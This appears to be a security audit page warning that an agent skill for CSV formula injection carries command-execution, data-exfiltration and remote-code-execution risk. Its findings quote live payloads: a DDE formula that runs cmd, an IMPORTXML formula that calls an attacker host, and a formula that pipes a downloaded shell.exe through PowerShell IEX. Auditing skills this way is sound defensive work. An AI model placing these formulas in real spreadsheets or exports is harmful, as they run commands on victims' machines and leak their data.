Skills
skills/yaklang/hack-skills/csv-formula-injection/Gen Agent Trust Hub

csv-formula-injection

Warn

Audited by Gen Agent Trust Hub on Apr 22, 2026

Risk Level: MEDIUMCOMMAND_EXECUTIONDATA_EXFILTRATIONREMOTE_CODE_EXECUTION
Full Analysis
  • [COMMAND_EXECUTION]: The skill documents several Dynamic Data Exchange (DDE) injection patterns, such as DDE("cmd";"/C calc";"!A0"), which are designed to execute arbitrary system commands when a victim opens a specially crafted CSV or spreadsheet file in applications like Excel or LibreOffice.
  • [DATA_EXFILTRATION]: The instructions include payloads utilizing Google Sheets functions like IMPORTXML, IMPORTHTML, and IMPORTDATA (e.g., =IMPORTXML("http://attacker.com/", "//a/@href")). These functions can be used to exfiltrate data from a spreadsheet to an external server via outbound network requests.
  • [REMOTE_CODE_EXECUTION]: A high-risk payload for remote code execution is provided in the documentation: =cmd|'/C powershell IEX(wget attacker_server/shell.exe)'!A0. This pattern enables an attacker to download and execute an external script or executable on the target host.
Audit Metadata
Risk Level
MEDIUM
Analyzed
Apr 22, 2026, 05:03 PM